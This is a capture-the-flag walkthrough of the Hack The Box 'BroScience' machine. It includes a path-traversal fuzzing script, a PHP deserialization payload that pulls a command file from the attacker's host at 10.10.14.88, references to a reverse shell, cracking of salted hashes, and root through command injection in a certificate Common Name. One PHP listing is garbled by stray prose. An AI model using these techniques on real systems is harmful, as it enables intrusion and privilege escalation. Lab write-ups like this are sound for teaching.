---
title: HTB-BroScience
tags: Favorite
---

## BroScience WriteUp

<style>

p {
	color: #A8D8B9;
	text-align: center;
	font-size: 1.2em;
	width: 50%;
	margin: 0 auto;
	margin-bottom: 20px;
}

img {
    display: block;
    margin: 0 auto;
}

.image-container {
  max-width: 100%;
  height: auto;
  display: flex;
  justify-content: center;
}

.responsive-image {
  max-width: 100%;
  height: auto;

</style>


<div class="image-container">
  <img src="/images/broscience.png" alt="BroScience" loop="1" class="responsive-image">
</div>


<h2 id="recon" style="color: greenyellow;"><u>Recon/Scanning</u></h2>
<!-- content for Recon/Scanning goes here -->

<div class="image-container">
  <img src="/images/WriteUps/BS/scan.png" alt="Scanning" class="responsive-image">
</div>

<p >
	A few interesting details can be found...<br>
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/host.png" alt="hostname" class="responsive-image">
</div>

<p>Lets quickly recon the webserver...</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/mainPage.png" alt="Scanning" class="responsive-image">
</div>

<p style="text-align: left;">
	A quick glance gives us users, Admin status of the users on the Application and looking at the source reveals PHP! I immediately noticed indacators that points to possible File Inclusion...
</p>

<center style="color: white;">
  <table>
    <tr>
      <th style="color: white;"><u>Users</u></th>
      <th style="color: white;"><u>ADMIN</u></th>
      <th style="color: white;"></th>
      <th style="color: white;"><u>ACTIVATED</u></th>
    </tr>
    <tr>
      <td>Administrator</td>
      <td>Yes</td>
      <td></td>
      <td>Yes</td>
    </tr>
    <tr>
      <td>Bill</td>
      <td>No</td>
      <td></td>
      <td>Yes</td>
    </tr>
    <tr>
      <td>Michael</td>
      <td>No</td>
      <td></td>
      <td>Yes</td>
    </tr>
    <tr>
      <td>John</td>
      <td>No</td>
      <td></td>
      <td>Yes</td>
    </tr>
    <tr>
      <td>dmytro</td>
      <td>No</td>
      <td></td>
      <td>Yes</td>
    </tr>
  </table>
</center>

<br>

<div class="image-container">
  <img src="/images/WriteUps/BS/source.png" alt="Scanning" class="responsive-image">
</div>

<p>
  Tried to create an account, greeted with an <span style="color: red;">"Account not Activated"</span>
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/account.png" alt="Scanning" class="responsive-image">
</div>

<div class="image-container">
  <img src="/images/WriteUps/BS/activation.png" alt="Scanning" class="responsive-image">
</div>

<p style="text-align: left;">
    We got redirected too <span style="color: yellowgreen;">activate.php</span> and we are unable to continue as we do not have the activation code...
</p>


<p style="text-align: left;">
	With PHP, we know (some.php?thing=) is used to denote the start of a query string. This allows us to pass information back to the server therefore opening up attacks like <span style="color: yellow;">Directory Traversal</span>. With this knowledge, let's try
</p>


<div class="image-container">
  <img src="/images/WriteUps/BS/detected.png" alt="Scanning" class="responsive-image">
</div>

<p style="text-align: left;">
	Attack Detected!!! <span style="color: yellow;">Input Sanitization</span> is happening but too what extent?!<br><br>Checking out <span style="color: yellowgreen;">/includes</span> the directory we found in the source code, there is one file that jumps out like a splinter on your big toe...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/includes.png" alt="Scanning" class="responsive-image">
</div>

<div class="image-container">
  <img src="/images/WriteUps/BS/missPath.png" alt="Scanning" class="responsive-image">
</div>

<p style="text-align: left;">
	<span style="color: red;"><i>Error: Missing 'path' param</i>?</span> This seemed rather interesting and I played around and found it was sanitizing my input, so lets see what we can do! Rather than manually trying different paths or payloads, lets use Python to automate this...
</p>

<div class="code-snippet">

```python
import ssl
import urllib.parse
import asyncio
import aiohttp

async def check_payload(session, payload):
    try:
        url = 'https://broscience.htb/includes/img.php?path=' + urllib.parse.quote(payload)
        async with session.get(url) as response:
            ans = await response.text()
            if 'root:' in ans:
                print('Payload found:', payload)
    except aiohttp.ClientError as e:
        print('Error:', str(e))

async def main():
    # Create a shared connection pool
    connector = aiohttp.TCPConnector(limit=20, ssl=False)  
    async with aiohttp.ClientSession(connector=connector) as session:
        with open('TravPayloads.txt') as f:
            payloads = [line.strip() for line in f]

        # Create tasks for each payload
        tasks = [check_payload(session, payload) for payload in payloads]

        # Run the tasks concurrently
        await asyncio.gather(*tasks)

# Run the asyncio event loop
asyncio.run(main())
```

</div>

<p style="text-align: left;">
 This could be better as this was quick and dirty, but payloads were found pretty quickly! It seems double encoding our payload is the key to bypassing this sanitation x_X
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/payload.png" alt="adding hostname" loop="1" class="responsive-image">
</div>

<p>
  <i><u><span style="color: yellowgreen;">/etc/passwd</span></u></i>
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/etcpass.png" alt="adding hostname" loop="1" class="responsive-image">
</div>

<p style="text-align: left;">
  Awesome! We found our <i>Entry Point</i>, how can we leverage this to get User. Speaking of user, it looks like from our list of users from the application that Bill is the only user on the box. Good to know, we are looking for <span style="color: yellowgreen;">/home/bill/user.txt</span>!
</p>

<h2 id="access" style="color: darkred;"><u>Gaining Access</u></h2>
<!-- content for Gaining Access goes here -->

<p style="text-align: left;">
  Now that we know this application is suseptible to Path Traversal, we can start mapping out the system and find more valuable information. I attempted to search for SSH keys or anything else of value that I could find but nothing seemed to work. <br><br>We seen a few php files that we can start with most notibly <span style="color: yellowgreen;">login.php</span> and <span style="color: yellowgreen;">register.php</span> as well as everything in <span style="color: yellowgreen;">/includes</span>. We should also look at <span style="color: yellowgreen;">/includes/img.php</span> to gather how our input is being sanitized...
</p>

<p>
    <i><u><span style="color: #15e9e9;">/includes/img.php</span></u></i>
</p>


<div class="code-snippet">

```php
<?php
if (!isset($_GET['path'])) {
    die('<b>Error:</b> Missing \'path\' parameter.');
}

// Check for LFI attacks
$path = $_GET['path'];

$badwords = array("../", "etc/passwd", ".ssh");
foreach ($badwords as $badword) {
    if (strpos($path, $badword) !== false) {
        die('<b>Error:</b> Attack detected.');
    }
}

// Normalize path
$path = urldecode($path);

// Return the image
header('Content-Type: image/png');
echo file_get_contents('/var/www/html/images/' . $path);
?>
```

</div>

<p style="text-align: left;">
    We can see how the code is filtering our input and how double encoding bypasses this as well as why I cannot get ssh. Now just dump the other files, like <span style="color: yellowgreen;">index.php</span> and <span style="color: yellowgreen;">login.php</span>. A few new files can be found from all this most notably <span style="color: yellowgreen;">db_connect.php</span>!
</p>

<p>
  <i><u><span style="color: #15e9e9;">/includes/db_connect.php</span></u></i>
</p>

<div class="code-snippet">

```php
<?php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";

$db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}");

if (!$db_conn) {
    die("<b>Error</b>: Unable to connect to database");
}
?>
```
</div>

<p>
  This will come in handy later...
</p>

<p>
  Peeking at the other files in <span style="color: yellowgreen;">/includes</span>
</p>

<p>
  <i><u><span style="color: #15e9e9;">/includes/utils.php</span></u></i>
</p>

<div id='utils' class="code-snippet">

```php
<?php
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(time());
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}

// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
function rel_time($from, $to = null) {
    $to = (($to === null) ? (time()) : ($to));
    $to = ((is_int($to)) ? ($to) : (strtotime($to)));
    $from = ((is_int($from)) ? ($from) : (strtotime($from)));

    $units = array
    (
        "year"   => 29030400, // seconds in a year   (12 months)
        "month"  => 2419200,  // seconds in a month  (4 weeks)
        "week"   => 604800,   // seconds in a week   (7 days)
        "day"    => 86400,    // seconds in a day    (24 hours)
        "hour"   => 3600,     // seconds in an hour  (60 minutes)
        "minute" => 60,       // seconds in a minute (60 seconds)
        "second" => 1         // 1 second
    );

    $diff = abs($from - $to);

    if ($diff < 1) {
        return "Just now";
    }

    $suffix = (($from > $to) ? ("from now") : ("ago"));

    $unitCount = 0;
    $output = "";

    foreach($units as $unit => $mult)
        if($diff >= $mult && $unitCount < 1) {
            $unitCount += 1;
            // $and = (($mult != 1) ? ("") : ("and "));
            $and = "";
            $output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
            $diff -= intval($diff / $mult) * $mult;
        }

    $output .= " ".$suffix;
    $output = substr($output, strlen(", "));

    return $output;
}

class UserPrefs {
    public $theme;

    public function __construct($theme = "light") {
                $this->theme = $theme;
    }
}

function get_theme() {
    if (isset($_SESSION['id'])) {
        if (!isset($_COOKIE['user-prefs'])) {
            $up_cookie = base64_encode(serialize(new UserPrefs()));
            setcookie('user-prefs', $up_cookie);
        } else {
            $up_cookie = $_COOKIE['user-prefs'];
        }
        $up = unserialize(base64_decode($up_cookie));
        return $up->theme;
    } else {
        return "light";
    }sanitizing our input. 
</p>
}

function get_theme_class($theme = null) {
    if (!isset($theme)) {
        $theme = get_theme();
    }
    if (strcmp($theme, "light")) {
        return "uk-light";
    } else {
        return "uk-dark";
    }
}

function set_theme($val) {
    if (isset($_SESSION['id'])) {
        setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
    }
}

class Avatar {
    public $imgPath;

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}

class AvatarInterface {
    public $tmp;
    public $imgPath; 

    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
?>
```

</div>

<p style="text-align: left;">
  Some things worth noting here as this is alot! The use of <span style="color: gold;">time()</span> inside function to generate an activation code as we could use this forge a code for a user and the <span style="color: gold;">__wakeup</span> PHP magic method<br><br>
  The time() function returns the current Unix timestamp, which represents the number of seconds elapsed since January 1, 1970. When we seed the PRNG (Pseudo-Random Number Generator) with time(), we are essentially using the current timestamp as the seed value<br><br>I am going to safely bet we will need to use this activation function to generate a code then use that to gain access to the application. We of course want to enumerate further as an authenticated user! Lets take a look at <span style="color: yellowgreen;">activate.php</span> before we begin...
</p>

<p>
  <i><u><span style="color: #15e9e9;">activate.php</span></u></i>
</p>

<div class='code-snippet'>

```php
<?php
session_start();

// Check if user is logged in already
if (isset($_SESSION['id'])) {
    header('Location: /index.php');
}

if (isset($_GET['code'])) {
    // Check if code is formatted correctly (regex)
    if (preg_match('/^[A-z0-9]{32}$/', $_GET['code'])) {
        // Check for code in database
        include_once 'includes/db_connect.php';

        $res = pg_prepare($db_conn, "check_code_query", 'SELECT id, is_activated::int FROM users WHERE activation_code=$1');
        $res = pg_execute($db_conn, "check_code_query", array($_GET['code']));

        if (pg_num_rows($res) == 1) {
            // Check if account already activated
            $row = pg_fetch_row($res);
            if (!(bool)$row[1]) {
                // Activate account
                $res = pg_prepare($db_conn, "activate_account_query", 'UPDATE users SET is_activated=TRUE WHERE id=$1');
                $res = pg_execute($db_conn, "activate_account_query", array($row[0]));
                
                $alert = "Account activated!";
                $alert_type = "success";
            } else {
                $alert = 'Account already activated.';
            }
        } else {
            $alert = "Invalid activation code.";
        }
    } else {
        $alert = "Invalid activation code.";
    }
} else {
    $alert = "Missing activation code.";
}
?>

<html>
    <head>
        <title>BroScience : Activate account</title>
        <?php include_once 'includes/header.php'; ?>
    </head>
    <body>
        <?php include_once 'includes/navbar.php'; ?>
        <div class="uk-container uk-container-xsmall">
            <?php
            // Display any alerts
            if (isset($alert)) {
            ?>
                <div uk-alert class="uk-alert-<?php if(isset($alert_type)){echo $alert_type;}else{echo 'danger';} ?>">
                    <a class="uk-alert-close" uk-close></a>
                    <?=$alert?>
                </div>
            <?php
            }
            ?>
        </div>
    </body>
</html>
```

</div>

<p style="text-align: left;">
  Nothing really screams out to me other than the Avatar class code but we can't do anything until we are authenticated but good news...<br><br>Looking at the pieces of the puzzle, we are going to create an account, POST our own Activation Code to ensure our account is created. We will need to grab the server time from the request of our registered user as that is how we will seed our activation code. I am the laziest hacker you will ever meet so I automated this...<br><br>This was not overly complicated but I could not for the life of me figure out how to translate PHP's <span style="color: gold;">strtotime</span> to Python. I decided to just run PHP to create an Activation code and use as an argument. (Im coming back for this!!!)
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/activated.png" alt="Scanning" class="responsive-image">
</div>

<p style="text-align: center;">
    Bata Bing Bata Boom 
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/loggedIN.png" alt="Scanning" class="responsive-image">
</div>

<p style="text-align: left;">
    <br>I immediately noticed the new cookie that was generated upon logging in, and we observed from <span style="color: yellowgreen;">/includes/utils.php</span> that it utilizes serialization techniques to store information pertaining to the theme and state.<br><br> 
</p>



<div class="image-container">
  <img src="/images/WriteUps/BS/serialized.png" alt="Scanning" class="responsive-image">
</div>

<span style="text-align: center;">Interesting...</span>

<p style="text-align: left;">
    So we saw the function <a href="#utils">get_theme</a> which shows us the code for our new Cookie. If you noticed that it gets passed to <span style="color: yellow;">unserialize</span> and you thought about a <span style="color: yellow;">PHP deserialization vulnerability</span> then we think alike!
</p>

<p style='text-align: left;'>
    Another use case for PHP, we can attempt too create our own Cookie and replace the current user-pref value to execute single-line commands aka <span style="color: yellow;">Remote Command Injection</span> (Hopefully). How does this work? <br><br>First we will need to understand how we can even talk back to us in the first place! The SAVE function in our Avatar class is using another PHP function <span style="color: yellow;">file_get_contents</span> and by defintion is a <i>built-in function that allows you to read the contents of a file or a URL into a string variable</i>. Did you read that right? a URL... with this knowledge we can maybe manipulate this to read back to our server, crossing fingers!!!. It then writes this to the <span style="color: peru;">$imgPath</span> variable, which we can probably set as ./filename or something that will store in the root of the application.<br><br> 
</p>

<span style="text-align: center;">A few mods of the PHP code to create a new Cookie will look like...</span>

<div class='code-snippet'>

```php
<?php
# This stays the same
class Avatar {
    public $imgPath;

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}

# Here we modify the $tmp & $imgPath to point to us
# as well as our malicious php cmd file
class AvatarInterface {
    # We create the variables ourselves...
    # file_get_contents is used $tmp, so we set as our server
    public $tmp = "http://10.10.14.88/user.php";
    # We can then save that too the $imgPath variable
    public $imgPath = "./user.php"; 

    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
# base64 encode so we can replace values
$payload = base64_encode(serialize(new AvatarInterface));
echo $payload
?>
```

</div>

<p>
  <i><u><span style="color: #15e9e9;">user.php</span></u></i>
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/userPHP.png" alt="Scanning" class="responsive-image">
</div>

<p>
    Alright, create our new cookie and replace the value...
</p>


<p style='text-align: left;'>
    We can use achieve Command Injection with PHP using a simple file like this. <span style="color: yellow;">$_REQUEST</span> is a <a href='https://www.php.net/manual/en/reserved.variables.request.php' target='_blank'>SuperGlobal Variable</a>! Basically a variable in PHP that is an associative array that contains the values of both the $_GET, $_POST, and $_COOKIE arrays. It can be used to access request parameters regardless of the HTTP method used.
</p>

<p>
    <br>Set up our web server...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/webserver.png" alt="Scanning" class="responsive-image">
</div>

<p>
    I had trouble but I realized we needed to remove the (=) from our new cookie value
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/download.png" alt="Scanning" class="responsive-image">
</div>

<p>
    <br>Downloaded ;)
</p>

<p>
    <br>Now send a request to our script with curl or browser
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/injection.png" alt="Scanning" class="responsive-image">
</div>

<p>
    <br>We can catch a shell quickly with BASH...
</p>

<p>
    <br>Set up our listener...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/listener.png" alt="Scanning" class="responsive-image">
</div>

<div class="image-container">
  <img src="/images/WriteUps/BS/somethingHappened.png" alt="Scanning" class="responsive-image">
</div>

<p style='text-align: left;'>
    It seemed to drop the file every few minutes, refreshing the page will re-download our file. Could be a box issue, probably layer 8 though X_X.
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/shell.png" alt="Scanning" class="responsive-image">
</div>

<p style='text-align: left;'>
    If you need help with getting a reverse shell, check <a href='https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells'>this</a> out but by now you should be solid at popping shells X_x! Well, we are on the box as www-data who cannot view the flag so we will need to move laterally to Bill. Onwards to Priv Esc!
</p>

<h2 id="privilege" style="color: lightgoldenrodyellow;"><u>Privilege Escalation</u></h2>
<!-- content for Privilege Escalation goes here -->

<p style='text-align: left;'>
    Were in! Now its time to get our bearing. We need to get a feel for the land we just entered before we can get root. First, we need to laterally move to bill because we still cannot attain our user flag. Womp Womp!
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/upgradeShell.png" alt="Scanning" class="responsive-image">
</div>

<p>
    Remember from our earlier recon, we found database information in <span style="color: yellowgreen;">db_connect.php</span>. 
</p>

<div class='code-snippet'>

```php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";
```

</div>


<div class="image-container">
  <img src="/images/WriteUps/BS/postgres.png" alt="Scanning" class="responsive-image">
</div>

<p >
    Time to enumerate this PostgreSQL Database...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/listTables.png" alt="Scanning" class="responsive-image">
</div>

<div class="image-container">
  <img src="/images/WriteUps/BS/tables.png" alt="Scanning" class="responsive-image">
</div>

<p >
    Grabbing everything from the users tables...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/hashes.png" alt="Scanning" class="responsive-image">
</div>

<p >
    Ruh Roh Raggy! Hashes that we shall attempt to crack
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/john.png" alt="Scanning" class="responsive-image">
</div>

<p style='text-align: left;'>
    We can create a custom John rule to handle the password salt which we know from the source code. Not familiar with this and want to <a href='https://akimbocore.com/article/custom-rules-for-john-the-ripper/' target='_blank'>get started</a> with John's Custom Rules!
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/passCrack.png" alt="Scanning" class="responsive-image">
</div>

<p style='text-align: left;'>
    You can see the custom rule added at the end of our <span style="color: yellow;">/usr/share/john/john.conf</span>, your location may be different. Basically all this does is prepend our value. 
</p>

<p>
    Or if your lazy like me, use sed...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/lazyWay.png" alt="Scanning" class="responsive-image">
</div>

<div class="image-container">
  <img src="/images/WriteUps/BS/hashIdent.png" alt="Scanning" class="responsive-image">
</div>

<p>
    Always make sure you keep your rockyou.txt updated or use a master list.
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/gotIT.png" alt="Scanning" class="responsive-image">
</div>

<p >
    Lateral move completed!
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/ssh.png" alt="Scanning" class="responsive-image">
</div>

<p >
    Onwards and Upwards...
</p>

<p style='text-align: left;'>
    Since we are on a Linux box, I immediately start with seeing what access I have with sudo as well as checking the  <span style="color: yellow;">/opt</span> directory as there is ALWAYS juicy things to find
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/sudo.png" alt="Scanning" class="responsive-image">
</div>

<p>
  <i><u><span style="color: #15e9e9;">renew.cert.sh</span></u></i>
</p>

<div class='code-snippet'>

```bash
#!/bin/bash

if [ "$#" -ne 1 ] || [ $1 == "-h" ] || [ $1 == "--help" ] || [ $1 == "help" ]; then
    echo "Usage: $0 certificate.crt";
    exit 0;
fi

if [ -f $1 ]; then

    openssl x509 -in $1 -noout -checkend 86400 > /dev/null

    if [ $? -eq 0 ]; then
        echo "No need to renew yet.";
        exit 1;
    fi

    subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-)

    country=$(echo $subject | grep -Eo 'C = .{2}')
    state=$(echo $subject | grep -Eo 'ST = .*,')
    locality=$(echo $subject | grep -Eo 'L = .*,')
    organization=$(echo $subject | grep -Eo 'O = .*,')
    organizationUnit=$(echo $subject | grep -Eo 'OU = .*,')
    commonName=$(echo $subject | grep -Eo 'CN = .*,?')
    emailAddress=$(openssl x509 -in $1 -noout -email)

    country=${country:4}
    state=$(echo ${state:5} | awk -F, '{print $1}')
    locality=$(echo ${locality:3} | awk -F, '{print $1}')
    organization=$(echo ${organization:4} | awk -F, '{print $1}')
    organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}')
    commonName=$(echo ${commonName:5} | awk -F, '{print $1}')

    echo $subject;
    echo "";
    echo "Country     => $country";
    echo "State       => $state";
    echo "Locality    => $locality";
    echo "Org Name    => $organization";
    echo "Org Unit    => $organizationUnit";
    echo "Common Name => $commonName";
    echo "Email       => $emailAddress";

    echo -e "\nGenerating certificate...";
    openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
    $state
    $locality
    $organization
    $organizationUnit
    $commonName
    $emailAddress
    " 2>/dev/null

    /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
else
    echo "File doesn't exist"
    exit 1;

```

</div>


<div class="image-container">
  <img src="/images/WriteUps/BS/optDir.png" alt="Scanning" class="responsive-image">
</div>


<p style='text-align: left;'>
    This script seems to be checking SSL certs expiration and if it is expired or about to expire, it parses fields to populate for the new cert. Hmmm, could we abuse this? 
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/escalate.png" alt="Scanning" class="responsive-image">
</div>  

<p style='text-align: left;'>
    The use of <span style="color: yellow;">$commonName</span> stands out, if we can control this we might be able to inject into this. You see how the variable is nestled right into that path. If we can escape it then we can control it! We can test by creating a cert with a payload inside the Common Name field that hopefully will get executed. Here is an example of how this works locally...
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/exploit.png" alt="Scanning" class="responsive-image">
</div> 

<p>
     Testing.........
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/rooted.png" alt="Scanning" class="responsive-image">
</div> 

<p>
     We own BroScience!!!
</p>

<h2 id="wrapup" style="color: royalblue;"><u>Wrapping Up</u></h2>
<!-- content for Wrapping Up goes here -->

<p style='text-align: left;'>
The cybersecurity exercise focused on a <span style="color: orangered;">Medium-level</span> machine, which involved various attack vectors like Web, Source Code Review, Deserialization, and Command Injection. Throughout the process, several crucial lessons were emphasized, highlighting the significance of cybersecurity practices to protect against potential vulnerabilities and attacks.<br><br>
One of the key takeaways from the exercise was the criticality of sanitizing user input. It is essential never to trust user input outright, as malicious actors can exploit this vulnerability to execute code injection attacks or cross-site scripting (XSS). By thoroughly validating and sanitizing user input, developers can prevent the execution of malicious code and bolster the security of their applications.<br><br>
The exercise also shed light on the significance of strong password practices. A password that can be easily cracked using widely known password lists, like "Rockyou," indicates a weak and easily guessable password. Security teams must prioritize robust password complexity requirements and enforce policies that minimize the risk of password compromises. Utilizing techniques like password hashing and salting can further enhance password security.<br><br>
Lastly, the exercise emphasized the value of conducting thorough source code reviews and penetration testing. These practices help identify and address security weaknesses in the early stages of development, reducing the chances of exposing vulnerable applications to potential attackers.<br><br>
In conclusion, the cybersecurity exercise provided a comprehensive understanding of various attack vectors and underscored the importance of proactive security measures. By prioritizing user input validation, enforcing strong password policies, maintaining a security-conscious mindset, and conducting regular security assessments, organizations can enhance their cybersecurity posture and better defend against potential threats. Cybersecurity is an ongoing journey, and with continuous vigilance and dedication to best practices, we can stay one step ahead of malicious actors and protect sensitive data and systems effectively.
</p>

<div class="image-container">
  <img src="/images/WriteUps/BS/respect.png" alt="Scanning" class="responsive-image">
</div> 

<p style='text-align: center;'>
     Shoutout to bmdyy for an awesome challenge!!!
</p>



